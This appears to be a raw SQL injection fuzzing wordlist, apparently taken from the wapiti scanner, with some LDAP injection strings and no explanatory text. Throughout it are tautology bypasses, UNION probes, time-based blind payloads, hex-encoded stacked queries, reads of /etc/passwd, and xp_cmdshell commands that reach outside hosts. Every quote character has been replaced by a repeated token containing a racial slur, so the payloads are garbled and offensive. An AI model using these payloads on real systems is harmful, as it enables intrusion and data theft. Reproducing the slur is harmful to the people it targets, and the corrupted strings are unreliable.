)%20or%20(HELLONIGERIOxHELLONIGERIO=HELLONIGERIOx
%20or%201=1
; execute immediate HELLONIGERIOselHELLONIGERIO || HELLONIGERIOect usHELLONIGERIO || HELLONIGERIOerHELLONIGERIO
benchmark(10000000,MD5(1))#
update
HELLONIGERIO;waitfor delay HELLONIGERIO0:0:__TIME__HELLONIGERIO--
1) or pg_sleep(__TIME__)--
||(elt(-3+5,bin(15),ord(10),hex(char(45))))
hiHELLONIGERIOHELLONIGERIOHELLONIGERIOHELLONIGERIO) or (HELLONIGERIOHELLONIGERIOHELLONIGERIOHELLONIGERIOaHELLONIGERIOHELLONIGERIOHELLONIGERIOHELLONIGERIO=HELLONIGERIOHELLONIGERIOHELLONIGERIOHELLONIGERIOaHELLONIGERIOHELLONIGERIOHELLONIGERIO
delete
like
HELLONIGERIO or sleep(__TIME__)#
pg_sleep(__TIME__)--
*(|(objectclass=*))
declare @q nvarchar (200) 0x730065006c00650063 ...
 or 0=0 #
insert
1) or sleep(__TIME__)#
) or (HELLONIGERIOaHELLONIGERIO=HELLONIGERIOa
; exec xp_regread
*|
@var select @var as var into temp end --
1)) or benchmark(10000000,MD5(1))#
asc
(||6)
aHELLONIGERIOHELLONIGERIOHELLONIGERIOHELLONIGERIO or 3=3--HELLONIGERIOHELLONIGERIOHELLONIGERIO
HELLONIGERIO or benchmark(10000000,MD5(1))#
# from wapiti
 or 0=0 --
1 waitfor delay HELLONIGERIO0:0:10HELLONIGERIO--
 or HELLONIGERIOaHELLONIGERIO=HELLONIGERIOa
hi or 1=1 --HELLONIGERIO
or a = a
 UNION ALL SELECT
) or sleep(__TIME__)=HELLONIGERIO
)) or benchmark(10000000,MD5(1))#
hiHELLONIGERIO or HELLONIGERIOaHELLONIGERIO=HELLONIGERIOa
0
21%
limit
 or 1=1
 or 2 > 1
HELLONIGERIO)) or benchmark(10000000,MD5(1))#
PRINT
hiHELLONIGERIO) or (HELLONIGERIOaHELLONIGERIO=HELLONIGERIOa
 or 3=3
));waitfor delay HELLONIGERIO0:0:__TIME__HELLONIGERIO--
aHELLONIGERIO waitfor delay HELLONIGERIO0:0:10HELLONIGERIO--
1;(load_file(char(47,101,116,99,47,112,97,115, ...
or%201=1
1 or sleep(__TIME__)#
or 1=1
 and 1 in (select var from temp)--
 or HELLONIGERIO7659HELLONIGERIO=HELLONIGERIO7659
 or HELLONIGERIOtextHELLONIGERIO = nHELLONIGERIOtextHELLONIGERIO
 --
 or 1=1 or HELLONIGERIOHELLONIGERIO=HELLONIGERIO
declare @s varchar (200) select @s = 0x73656c6 ...
exec xp
; exec master..xp_cmdshell HELLONIGERIOping 172.10.1.255HELLONIGERIO--
3.10E+17
 or pg_sleep(__TIME__)--HELLONIGERIO
xHELLONIGERIO AND email IS NULL; --
&
adminHELLONIGERIO or HELLONIGERIO
 or HELLONIGERIOunusualHELLONIGERIO = HELLONIGERIOunusualHELLONIGERIO
//
truncate
1) or benchmark(10000000,MD5(1))#
\x27UNION SELECT
declare @s varchar(200) select @s = 0x77616974 ...
tz_offset
sqlvuln
HELLONIGERIO));waitfor delay HELLONIGERIO0:0:__TIME__HELLONIGERIO--
||6
or%201=1 --
%2A%28%7C%28objectclass%3D%2A%29%29
or a=a
) union select * from information_schema.tables;
PRINT @@variable
or isNULL(1/0) /*
26 %
 or HELLONIGERIOHELLONIGERIOaHELLONIGERIOHELLONIGERIO=HELLONIGERIOHELLONIGERIOaHELLONIGERIO
(sqlvuln)
xHELLONIGERIO AND members.email IS NULL; --
 or 1=1--
 and 1=( if((load_file(char(110,46,101,120,11 ...
0x770061006900740066006F0072002000640065006C00 ...
%20HELLONIGERIOsleep%2050HELLONIGERIO
as
1)) or pg_sleep(__TIME__)--
/**/or/**/1/**/=/**/1
 union all select @@version--
,@variable
(sqlattempt2)
 or (EXISTS)
tHELLONIGERIOexec master..xp_cmdshell HELLONIGERIOnslookup www.googl ...
%20$(sleep%2050)
1 or benchmark(10000000,MD5(1))#
%20or%20HELLONIGERIOHELLONIGERIO=HELLONIGERIO
||UTL_HTTP.REQUEST
 or pg_sleep(__TIME__)--
hiHELLONIGERIO or HELLONIGERIOxHELLONIGERIO=HELLONIGERIOxHELLONIGERIO;
) or sleep(__TIME__)=
 or HELLONIGERIOwhateverHELLONIGERIO in (HELLONIGERIOwhateverHELLONIGERIO)
; begin declare @var varchar(8000) set @var=HELLONIGERIO ...
 union select 1,load_file(HELLONIGERIO/etc/passwdHELLONIGERIO),1,1,1;
0x77616974666F722064656C61792027303A303A313027 ...
exec(@s)
) or pg_sleep(__TIME__)--
 union select
 or sleep(__TIME__)#
 select * from information_schema.tables--
aHELLONIGERIO or 1=1--
aHELLONIGERIO or HELLONIGERIOaHELLONIGERIO = HELLONIGERIOa
declare @s varchar(22) select @s =
 or 2 between 1 and 3
 or a=a--
 or HELLONIGERIO1HELLONIGERIO=HELLONIGERIO1
|
 or sleep(__TIME__)=HELLONIGERIO
 or 1 --HELLONIGERIO
or 0=0 #HELLONIGERIO
having
aHELLONIGERIO
HELLONIGERIO or isNULL(1/0) /*
declare @s varchar (8000) select @s = 0x73656c ...
‘ or 1=1 --
char%4039%41%2b%40SELECT
order by
bfilename
 having 1=1--
) or benchmark(10000000,MD5(1))#
 or username like char(37);
;waitfor delay HELLONIGERIO0:0:__TIME__HELLONIGERIO--
 or 1=1--HELLONIGERIO
xHELLONIGERIO AND userid IS NULL; --
*/*
 or HELLONIGERIOtextHELLONIGERIO > HELLONIGERIOtHELLONIGERIO
 (select top 1
 or benchmark(10000000,MD5(1))#
HELLONIGERIO);waitfor delay HELLONIGERIO0:0:__TIME__HELLONIGERIO--
aHELLONIGERIO or 3=3--
 -- &password=
 group by userid having 1=1--
 or HELLONIGERIOHELLONIGERIO=HELLONIGERIO
; exec master..xp_cmdshell
%20or%20x=x
select
)) or sleep(__TIME__)=HELLONIGERIOHELLONIGERIOHELLONIGERIO
0x730065006c0065006300740020004000400076006500 ...
hiHELLONIGERIO or 1=1 --
HELLONIGERIO) or pg_sleep(__TIME__)--
%20or%20HELLONIGERIOxHELLONIGERIO=HELLONIGERIOx
 or HELLONIGERIOsomethingHELLONIGERIO = HELLONIGERIOsomeHELLONIGERIO+HELLONIGERIOthingHELLONIGERIO
exec sp
29 %
(
ý or 1=1 --
1 or pg_sleep(__TIME__)--
0 or 1=1
) or (a=a
uni/**/on sel/**/ect
replace
%27%20or%201=1
)) or pg_sleep(__TIME__)--
%7C
xHELLONIGERIO AND 1=(SELECT COUNT(*) FROM tabname); --
&apos;%20OR
; or HELLONIGERIO1HELLONIGERIO=HELLONIGERIO1HELLONIGERIO
declare @q nvarchar (200) select @q = 0x770061 ...
1 or 1=1
; exec (HELLONIGERIOselHELLONIGERIO + HELLONIGERIOect usHELLONIGERIO + HELLONIGERIOerHELLONIGERIO)
23 OR 1=1
/
anythingHELLONIGERIO OR HELLONIGERIOxHELLONIGERIO=HELLONIGERIOx
declare @q nvarchar (4000) select @q =
or 0=0 --
desc
||HELLONIGERIO6
)
1)) or sleep(__TIME__)#
or 0=0 #
 select name from syscolumns where id = (sele ...
hi or a=a
*(|(mail=*))
password:*/=1--
distinct
);waitfor delay HELLONIGERIO0:0:__TIME__HELLONIGERIO--
to_timestamp_tz
) or benchmark(10000000,MD5(1))#HELLONIGERIO
%2A%28%7C%28mail%3D%2A%29%29
#NAME?
 or 1=1 /*
)) or sleep(__TIME__)=HELLONIGERIO
or 1=1 or HELLONIGERIOHELLONIGERIO=
 or 1 in (select @@version)--
sqlvuln;
 union select * from users where login = char ...
xHELLONIGERIO or 1=1 or HELLONIGERIOxHELLONIGERIO=HELLONIGERIOy
28%
‘ or 3=3 --
@variable
 or HELLONIGERIO1HELLONIGERIO=HELLONIGERIO1HELLONIGERIO--
aHELLONIGERIO or 1=1--
//*
%2A%7C
HELLONIGERIO or 0=0 --
)) or pg_sleep(__TIME__)--HELLONIGERIO
?
 or 1/*
!
HELLONIGERIO
 or a = a
declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s) 
declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
HELLONIGERIO or 1=1
 or 1=1 --
xHELLONIGERIO OR full_name LIKE HELLONIGERIO%Bob%
HELLONIGERIO; exec master..xp_cmdshell HELLONIGERIOping 172.10.1.255HELLONIGERIO--
HELLONIGERIO%20or%20HELLONIGERIOHELLONIGERIO=HELLONIGERIO
HELLONIGERIO%20or%20HELLONIGERIOxHELLONIGERIO=HELLONIGERIOx
HELLONIGERIO)%20or%20(HELLONIGERIOxHELLONIGERIO=HELLONIGERIOx
HELLONIGERIO or 0=0 --
HELLONIGERIO or 0=0 #
 or 0=0 #HELLONIGERIO
HELLONIGERIO or 1=1--
HELLONIGERIO or HELLONIGERIO1HELLONIGERIO=HELLONIGERIO1HELLONIGERIO--
HELLONIGERIO or 1 --HELLONIGERIO
or 1=1--
HELLONIGERIO or 1=1 or HELLONIGERIOHELLONIGERIO=HELLONIGERIO
 or 1=1 or HELLONIGERIOHELLONIGERIO=
HELLONIGERIO or a=a--
 or a=a
HELLONIGERIO) or (HELLONIGERIOaHELLONIGERIO=HELLONIGERIOa
HELLONIGERIOhiHELLONIGERIO or HELLONIGERIOxHELLONIGERIO=HELLONIGERIOxHELLONIGERIO;
or
procedure
handler
HELLONIGERIO or username like HELLONIGERIO%
HELLONIGERIO or uname like HELLONIGERIO%
HELLONIGERIO or userid like HELLONIGERIO%
HELLONIGERIO or uid like HELLONIGERIO%
HELLONIGERIO or user like HELLONIGERIO%
HELLONIGERIO; exec master..xp_cmdshell
HELLONIGERIO; exec xp_regread
tHELLONIGERIOexec master..xp_cmdshell HELLONIGERIOnslookup www.google.comHELLONIGERIO--
HELLONIGERIO UNION SELECT
HELLONIGERIO UNION ALL SELECT
HELLONIGERIO or (EXISTS)
HELLONIGERIO (select top 1
HELLONIGERIO||UTL_HTTP.REQUEST
1;SELECT%20*
<>HELLONIGERIOHELLONIGERIO%;)(&+
HELLONIGERIO%20or%201=1
HELLONIGERIOsqlattempt1
29%
26%
HELLONIGERIO or HELLONIGERIOHELLONIGERIO=HELLONIGERIO
HELLONIGERIO or 3=3
HELLONIGERIO or 3=3 --
